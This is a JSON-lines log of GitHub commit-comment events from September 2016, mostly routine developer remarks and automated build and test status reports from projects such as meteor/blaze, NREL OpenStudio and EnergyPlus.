{"id":"4559159227","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":19011268,"position":null,"line":null,"path":null,"commit_id":"2b6a543e7ce9e3ac20556f7fc0462a45654d9900","created_at":"2016-09-14T00:34:56Z","updated_at":"2016-09-14T00:34:56Z","body":"persisting left and top offsets as strings had an unexpected side-effect during default layout of child Picos. fixed by converting them to numbers just-in-time for layout calculations"}},"created_at":"2016-09-14T00:34:56Z"}
{"id":"4559159789","type":"CommitCommentEvent","actor":{"login":"alexander-mead"},"repo":{"name":"cmbant/CAMB"},"payload":{"comment":{"id":19011271,"position":null,"line":null,"path":null,"commit_id":"3018e4b073afb4cd1038e6110417321dbec85d2e","created_at":"2016-09-14T00:35:08Z","updated_at":"2016-09-14T00:35:08Z","body":"Hmm... I was using v5 before, and I have now updated to v6.2.0 and\ninstalled it (without multilib because it says that there are problems with\nmultilib and open-mp), but the problem still occurs.\n\nOn 13 September 2016 at 10:41, Antony Lewis <notifications@github.com>\nwrote:\n\n> Probably a gfortran bug - which version? (try with latest version 6?)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cmbant/CAMB/commit/3018e4b073afb4cd1038e6110417321dbec85d2e#commitcomment-19005674>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIt64SEHcm0lcCXFakPAZpFqCBK1g2T2ks5qpuBHgaJpZM4J0HEx>\n> .\n>\n"}},"created_at":"2016-09-14T00:35:08Z"}
{"id":"4559184912","type":"CommitCommentEvent","actor":{"login":"Dramacydal"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19011313,"position":null,"line":null,"path":null,"commit_id":"ff2d9d325692b4a4f86ecdf76dbd8fe2dd2624af","created_at":"2016-09-14T00:43:34Z","updated_at":"2016-09-14T00:43:34Z","body":"it was introduced in MoP xD"}},"created_at":"2016-09-14T00:43:34Z"}
{"id":"4559187520","type":"CommitCommentEvent","actor":{"login":"heroes7"},"repo":{"name":"haozheMa/PullAndDownDemo2"},"payload":{"comment":{"id":19011314,"position":null,"line":null,"path":null,"commit_id":"5fb1b3db8b786658b7d6b1a534d20e481784ea21","created_at":"2016-09-14T00:44:27Z","updated_at":"2016-09-14T00:44:27Z","body":"OC语言，我的是简单的移动端页面，商品详情页，我们老大让我做成和京东一模一样的。这OC语言，我看不懂，程序员更看不懂了。你写的非常好，对我的成长有帮助。哎，只能看看你写的OC语言了。。。"}},"created_at":"2016-09-14T00:44:27Z"}
{"id":"4559187726","type":"CommitCommentEvent","actor":{"login":"QMonkey"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":19011315,"position":null,"line":null,"path":null,"commit_id":"bb76f24af2010943387ce696a7092175b4ecccf2","created_at":"2016-09-14T00:44:31Z","updated_at":"2016-09-14T00:44:31Z","body":"Wow!"}},"created_at":"2016-09-14T00:44:31Z"}
{"id":"4559191667","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19011319,"position":null,"line":null,"path":null,"commit_id":"d3f07853a308ca39ebbaf22910f27beea26db0b8","created_at":"2016-09-14T00:45:47Z","updated_at":"2016-09-14T00:45:47Z","body":"Build report #159756877 for sha d3f07853a308ca39ebbaf22910f27beea26db0b8:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1808%20/%208587%20%2821.06%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-14T00:45:47Z"}
{"id":"4559192554","type":"CommitCommentEvent","actor":{"login":"heathermiller"},"repo":{"name":"heathermiller/papers-documents"},"payload":{"comment":{"id":19011320,"position":null,"line":null,"path":null,"commit_id":"6910da53995278d9f6887a040941106ff4c4cd7e","created_at":"2016-09-14T00:46:06Z","updated_at":"2016-09-14T00:46:06Z","body":"Shit. This added like 3 pages!"}},"created_at":"2016-09-14T00:46:06Z"}
{"id":"4559197162","type":"CommitCommentEvent","actor":{"login":"crisdanielcm"},"repo":{"name":"crisdanielcm/futbolitoappAndroid"},"payload":{"comment":{"id":19011329,"position":null,"line":null,"path":null,"commit_id":"5c985eea7cc042ff552c589207bcf7f070e6d000","created_at":"2016-09-14T00:47:46Z","updated_at":"2016-09-14T00:47:46Z","body":"cambios"}},"created_at":"2016-09-14T00:47:46Z"}
{"id":"4559198242","type":"CommitCommentEvent","actor":{"login":"bengott"},"repo":{"name":"meteor/blaze"},"payload":{"comment":{"id":19011332,"position":null,"line":null,"path":null,"commit_id":"6af0a1b1b63e93c7bd639fe07e5c934ad7f1c0a4","created_at":"2016-09-14T00:48:08Z","updated_at":"2016-09-14T00:48:08Z","body":"**'Edit on GitHub' links are broken**\r\n\r\nI'm not very familiar with Hexo config files, but it looks like `github_repo` and `content_root` are used to generate the orange 'Edit on GitHub' link buttons. After looking at the [history](https://github.com/meteor/blaze/commits/master/site/_config.yml), it appears that these two lines have changed a few times in the process of moving things around.\r\n\r\nI had a PR in the works, but given my lack of experience with Hexo, I figured it would be best to comment here first. I'm assuming that changing `content_root: 'site'` to `content_root: 'site/source'`will fix the links. Am I correct? @mitar @alexandesigner"}},"created_at":"2016-09-14T00:48:08Z"}
{"id":"4559203739","type":"CommitCommentEvent","actor":{"login":"singku"},"repo":{"name":"NYU-CS6313-SPRING2016/Group-5-StockTweets"},"payload":{"comment":{"id":19011341,"position":null,"line":null,"path":null,"commit_id":"b97516ae04ad290f66469661aecb4e58607abbaf","created_at":"2016-09-14T00:50:02Z","updated_at":"2016-09-14T00:50:02Z","body":"真牛逼，一直在follow"}},"created_at":"2016-09-14T00:50:02Z"}
{"id":"4559205357","type":"CommitCommentEvent","actor":{"login":"mitar"},"repo":{"name":"meteor/blaze"},"payload":{"comment":{"id":19011346,"position":null,"line":null,"path":null,"commit_id":"6af0a1b1b63e93c7bd639fe07e5c934ad7f1c0a4","created_at":"2016-09-14T00:50:36Z","updated_at":"2016-09-14T00:50:36Z","body":"Yea, I am not sure what was the change here, @stubailo?"}},"created_at":"2016-09-14T00:50:36Z"}
{"id":"4559208466","type":"CommitCommentEvent","actor":{"login":"stubailo"},"repo":{"name":"meteor/blaze"},"payload":{"comment":{"id":19011354,"position":null,"line":null,"path":null,"commit_id":"6af0a1b1b63e93c7bd639fe07e5c934ad7f1c0a4","created_at":"2016-09-14T00:51:41Z","updated_at":"2016-09-14T00:51:41Z","body":"ohh, yeah perhaps that is better. It didn't work before I made this change either though. I thought this would be it but it wasn't."}},"created_at":"2016-09-14T00:51:41Z"}
{"id":"4559209159","type":"CommitCommentEvent","actor":{"login":"apattno"},"repo":{"name":"apattno/First"},"payload":{"comment":{"id":19011356,"position":1,"line":1,"path":"DFD","commit_id":"100406ab860201cc88b64d369385b0ef17961d40","created_at":"2016-09-14T00:51:53Z","updated_at":"2016-09-14T00:51:53Z","body":"![image](https://cloud.githubusercontent.com/assets/21365184/18496418/4bcb20e4-79eb-11e6-8f3f-90a7884d29f7.png)\r\n"}},"created_at":"2016-09-14T00:51:53Z"}
{"id":"4559212473","type":"CommitCommentEvent","actor":{"login":"noony"},"repo":{"name":"facebook/hhvm"},"payload":{"comment":{"id":19011364,"position":19,"line":561,"path":"hphp/runtime/ext/curl/curl-resource.cpp","commit_id":"9d998feb83ccbd8fea83ddde242597b519a255df","created_at":"2016-09-14T00:53:01Z","updated_at":"2016-09-14T00:53:01Z","body":"https://github.com/php/php-src/blob/2a71140d54e956f11acbe33f2681d27086874d2e/ext/curl/interface.c#L2487"}},"created_at":"2016-09-14T00:53:01Z"}
{"id":"4559213690","type":"CommitCommentEvent","actor":{"login":"mitar"},"repo":{"name":"meteor/blaze"},"payload":{"comment":{"id":19011369,"position":null,"line":null,"path":null,"commit_id":"6af0a1b1b63e93c7bd639fe07e5c934ad7f1c0a4","created_at":"2016-09-14T00:53:25Z","updated_at":"2016-09-14T00:53:25Z","body":":-)\r\n\r\n@bengott: Thanks for looking into this. I suggest you simply do your changes locally and then run Hexo locally and see what is the result and if links work. You can see how to do that in README in `site` directory."}},"created_at":"2016-09-14T00:53:25Z"}
{"id":"4559214238","type":"CommitCommentEvent","actor":{"login":"flaminisx"},"repo":{"name":"SashaUkraine/SuccessClubSite"},"payload":{"comment":{"id":19011371,"position":null,"line":null,"path":null,"commit_id":"6d77c3666a06321d1e61364969228919d30d33c2","created_at":"2016-09-14T00:53:39Z","updated_at":"2016-09-14T00:53:39Z","body":"also need to link config/nginx.conf to /etc/nginx/sites-enabled/"}},"created_at":"2016-09-14T00:53:39Z"}
{"id":"4559214710","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19011375,"position":null,"line":null,"path":null,"commit_id":"d34f2f7b7dd7d5209238d2ab09117dfd3fd61993","created_at":"2016-09-14T00:53:47Z","updated_at":"2016-09-14T00:53:47Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2311 of 2467 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d34f2f7b7dd7d5209238d2ab09117dfd3fd61993-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d34f2f7b7dd7d5209238d2ab09117dfd3fd61993-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.68%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T00:53:47Z"}
{"id":"4559215778","type":"CommitCommentEvent","actor":{"login":"flaminisx"},"repo":{"name":"SashaUkraine/SuccessClubSite"},"payload":{"comment":{"id":19011379,"position":null,"line":null,"path":null,"commit_id":"6d77c3666a06321d1e61364969228919d30d33c2","created_at":"2016-09-14T00:54:11Z","updated_at":"2016-09-14T00:54:11Z","body":"commit has problems with assets"}},"created_at":"2016-09-14T00:54:11Z"}
{"id":"4559216097","type":"CommitCommentEvent","actor":{"login":"sumobi"},"repo":{"name":"AffiliateWP/AffiliateWP"},"payload":{"comment":{"id":19011381,"position":null,"line":null,"path":null,"commit_id":"647de5a9728e0b6602fd9246d9a2e15c89a14e31","created_at":"2016-09-14T00:54:16Z","updated_at":"2016-09-14T00:54:16Z","body":"#1552 "}},"created_at":"2016-09-14T00:54:16Z"}
{"id":"4559218025","type":"CommitCommentEvent","actor":{"login":"smyhvae"},"repo":{"name":"Stay/flarum"},"payload":{"comment":{"id":19011385,"position":9,"line":14,"path":"index.php","commit_id":"b009ea6b1c86613ceacbf4ddfc60da3b7ca5802d","created_at":"2016-09-14T00:54:53Z","updated_at":"2016-09-14T00:54:53Z","body":"a"}},"created_at":"2016-09-14T00:54:53Z"}
{"id":"4559224223","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19011395,"position":null,"line":null,"path":null,"commit_id":"b057e2995c54a1446b9acd68434628441a313008","created_at":"2016-09-14T00:57:05Z","updated_at":"2016-09-14T00:57:05Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b057e2995c54a1446b9acd68434628441a313008-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b057e2995c54a1446b9acd68434628441a313008-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T00:57:05Z"}
{"id":"4559231406","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19011409,"position":null,"line":null,"path":null,"commit_id":"b057e2995c54a1446b9acd68434628441a313008","created_at":"2016-09-14T00:59:38Z","updated_at":"2016-09-14T00:59:38Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b057e2995c54a1446b9acd68434628441a313008-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b057e2995c54a1446b9acd68434628441a313008-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T00:59:38Z"}
{"id":"4559231905","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19011412,"position":null,"line":null,"path":null,"commit_id":"28297cc863ed7272701a837111030e420ba0c9fb","created_at":"2016-09-14T00:59:47Z","updated_at":"2016-09-14T00:59:47Z","body":"os_2.0_develop_signal_slot_bug (mbadams5) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-28297cc863ed7272701a837111030e420ba0c9fb-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-28297cc863ed7272701a837111030e420ba0c9fb-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T00:59:47Z"}
{"id":"4559237935","type":"CommitCommentEvent","actor":{"login":"jevolk"},"repo":{"name":"jevolk/athemepark"},"payload":{"comment":{"id":19011424,"position":47,"line":47,"path":"modules/ecma/mitsein.h","commit_id":"4529b5a785529dae8db1238de467fd8f41d8073f","created_at":"2016-09-14T01:01:46Z","updated_at":"2016-09-14T01:01:46Z","body":"oops"}},"created_at":"2016-09-14T01:01:46Z"}
{"id":"4559239270","type":"CommitCommentEvent","actor":{"login":"jevolk"},"repo":{"name":"jevolk/athemepark"},"payload":{"comment":{"id":19011426,"position":52,"line":52,"path":"modules/ecma/mitsein.h","commit_id":"4529b5a785529dae8db1238de467fd8f41d8073f","created_at":"2016-09-14T01:02:14Z","updated_at":"2016-09-14T01:02:14Z","body":"oops"}},"created_at":"2016-09-14T01:02:14Z"}
{"id":"4559242836","type":"CommitCommentEvent","actor":{"login":"HoonHwang"},"repo":{"name":"HoonHwang/SpechtLiteConf"},"payload":{"comment":{"id":19011430,"position":2,"line":2,"path":"README.md","commit_id":"042385bc856d34ca4ca1759b0b82cf761ef092d6","created_at":"2016-09-14T01:03:29Z","updated_at":"2016-09-14T01:03:29Z","body":"Please copy all files except **README.md** to your **_.SpechtLite_** folder\r\nAll **Reject**/**Proxy**/**Direct** rules are converted from **逗bi极客**'s Surge rule"}},"created_at":"2016-09-14T01:03:29Z"}
{"id":"4559255702","type":"CommitCommentEvent","actor":{"login":"Xusine1131"},"repo":{"name":"Fsu0413/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":19011455,"position":null,"line":null,"path":null,"commit_id":"ff5a0f6545b453c4a35d7935d54d282b7f60de58","created_at":"2016-09-14T01:07:55Z","updated_at":"2016-09-14T01:07:55Z","body":"该不会让我写完剩下的吧……"}},"created_at":"2016-09-14T01:07:55Z"}
{"id":"4559264987","type":"CommitCommentEvent","actor":{"login":"AirwavesMan"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19011472,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-14T01:11:15Z","updated_at":"2016-09-14T01:11:15Z","body":"That fix is just aweome. Never swimming again on taviana. it works pretty well"}},"created_at":"2016-09-14T01:11:15Z"}
{"id":"4559268578","type":"CommitCommentEvent","actor":{"login":"heathermiller"},"repo":{"name":"heathermiller/papers-documents"},"payload":{"comment":{"id":19011486,"position":null,"line":null,"path":null,"commit_id":"6910da53995278d9f6887a040941106ff4c4cd7e","created_at":"2016-09-14T01:12:31Z","updated_at":"2016-09-14T01:12:31Z","body":"Ah, ok. The acceptance email said in the final version the body was limited to 13 pages (as it was for submission). However, the website and submission page say 20 pages. So I think we're OK."}},"created_at":"2016-09-14T01:12:31Z"}
{"id":"4559299402","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011554,"position":null,"line":null,"path":null,"commit_id":"69c685c242f9be19d8e1f66481a2c106ab588ea6","created_at":"2016-09-14T01:23:53Z","updated_at":"2016-09-14T01:23:53Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1762 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-14T01:23:53Z"}
{"id":"4559304612","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011566,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-14T01:25:49Z","updated_at":"2016-09-14T01:25:49Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-14T01:25:49Z"}
{"id":"4559304968","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011567,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-14T01:25:57Z","updated_at":"2016-09-14T01:25:57Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T01:25:57Z"}
{"id":"4559305441","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011569,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-14T01:26:09Z","updated_at":"2016-09-14T01:26:09Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-14T01:26:09Z"}
{"id":"4559306074","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011570,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-14T01:26:21Z","updated_at":"2016-09-14T01:26:21Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-14T01:26:21Z"}
{"id":"4559306488","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011571,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-14T01:26:30Z","updated_at":"2016-09-14T01:26:30Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T01:26:30Z"}
{"id":"4559309905","type":"CommitCommentEvent","actor":{"login":"hutomoajip10"},"repo":{"name":"hutomoajip10/ASD_Task_2"},"payload":{"comment":{"id":19011582,"position":null,"line":null,"path":null,"commit_id":"b7affa3ebd73d9c1ff5bd9583fc8ca8836fed8f4","created_at":"2016-09-14T01:27:42Z","updated_at":"2016-09-14T01:27:42Z","body":"Programnya masih gagal pak"}},"created_at":"2016-09-14T01:27:42Z"}
{"id":"4559310585","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"DenisCarriere/canvec-ogr2osm-translation"},"payload":{"comment":{"id":19011583,"position":null,"line":null,"path":null,"commit_id":"e1ddcb99aad9c705262cb36cde8a9f3bd85ff9ef","created_at":"2016-09-14T01:27:59Z","updated_at":"2016-09-14T01:27:59Z","body":"I know! I was surprised as well! I'm typically running Python3 for most of my projects, however I still have Python 2 for testing."}},"created_at":"2016-09-14T01:27:59Z"}
{"id":"4559312944","type":"CommitCommentEvent","actor":{"login":"JckYabo"},"repo":{"name":"JckYabo/ITHomeDemo"},"payload":{"comment":{"id":19011587,"position":null,"line":null,"path":null,"commit_id":"e5de9aaba35fb2bf527838735f74ce45e3d132b2","created_at":"2016-09-14T01:28:51Z","updated_at":"2016-09-14T01:28:51Z","body":"👍 "}},"created_at":"2016-09-14T01:28:51Z"}
{"id":"4559315901","type":"CommitCommentEvent","actor":{"login":"hlian"},"repo":{"name":"sleexyz/haskell-fun"},"payload":{"comment":{"id":19011602,"position":145,"line":118,"path":"TypeSafePrintF.hs","commit_id":"4bb9736de002515f510769b8c00a3830b0d3dd24","created_at":"2016-09-14T01:29:54Z","updated_at":"2016-09-14T01:29:54Z","body":"i think you may be able to get rid of proxies altogether with typeapplication? i fear this well outside my area of expertise"}},"created_at":"2016-09-14T01:29:54Z"}
{"id":"4559317369","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19011605,"position":24,"line":925,"path":"app/ledger.js","commit_id":"400f14980a983a9c6dca479faad415e10ff0a30e","created_at":"2016-09-14T01:30:25Z","updated_at":"2016-09-14T01:30:25Z","body":"please remove this logging in default mode"}},"created_at":"2016-09-14T01:30:25Z"}
{"id":"4559319236","type":"CommitCommentEvent","actor":{"login":"giorgichi"},"repo":{"name":"giorgichi/testweb"},"payload":{"comment":{"id":19011608,"position":null,"line":null,"path":null,"commit_id":"b1bac78c947d6d4de09005ee0739b2626e4ec9d8","created_at":"2016-09-14T01:31:06Z","updated_at":"2016-09-14T01:31:06Z","body":"did not work crossing out"}},"created_at":"2016-09-14T01:31:06Z"}
{"id":"4559320594","type":"CommitCommentEvent","actor":{"login":"slang800"},"repo":{"name":"iHavee/dockerfiles"},"payload":{"comment":{"id":19011612,"position":4,"line":37,"path":"transmission/Dockerfile","commit_id":"dc6b8231e13ee5d8420b45b775455789b50542a5","created_at":"2016-09-14T01:31:36Z","updated_at":"2016-09-14T01:31:36Z","body":"Why are you disabling the DHT?"}},"created_at":"2016-09-14T01:31:36Z"}
{"id":"4559321036","type":"CommitCommentEvent","actor":{"login":"giorgichi"},"repo":{"name":"giorgichi/testweb"},"payload":{"comment":{"id":19011614,"position":5,"line":30,"path":"index.html","commit_id":"b1bac78c947d6d4de09005ee0739b2626e4ec9d8","created_at":"2016-09-14T01:31:46Z","updated_at":"2016-09-14T01:31:46Z","body":"did not work crossing out"}},"created_at":"2016-09-14T01:31:46Z"}
{"id":"4559324780","type":"CommitCommentEvent","actor":{"login":"psathyrella"},"repo":{"name":"psathyrella/partis"},"payload":{"comment":{"id":19011624,"position":null,"line":null,"path":null,"commit_id":"4a83cb8c9023da3a2fe30ee65610c593aa18e627","created_at":"2016-09-14T01:33:04Z","updated_at":"2016-09-14T01:33:04Z","body":"holy `&#$*%^`buckets that speeds up clustering."}},"created_at":"2016-09-14T01:33:04Z"}
{"id":"4559333529","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19011651,"position":null,"line":null,"path":null,"commit_id":"fd626d203a3704c9c85350e3e5d30d2245f771a2","created_at":"2016-09-14T01:36:15Z","updated_at":"2016-09-14T01:36:15Z","body":"os_2.0_develop_signal_slot_bug (mbadams5) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fd626d203a3704c9c85350e3e5d30d2245f771a2-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fd626d203a3704c9c85350e3e5d30d2245f771a2-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T01:36:15Z"}
{"id":"4559333904","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"ForgeEssentials/ForgeEssentials"},"payload":{"comment":{"id":19011655,"position":14,"line":69,"path":"build.gradle","commit_id":"317a64204036f9b66b57d0125399628620f5d707","created_at":"2016-09-14T01:36:24Z","updated_at":"2016-09-14T01:36:24Z","body":"Why not 1614"}},"created_at":"2016-09-14T01:36:24Z"}
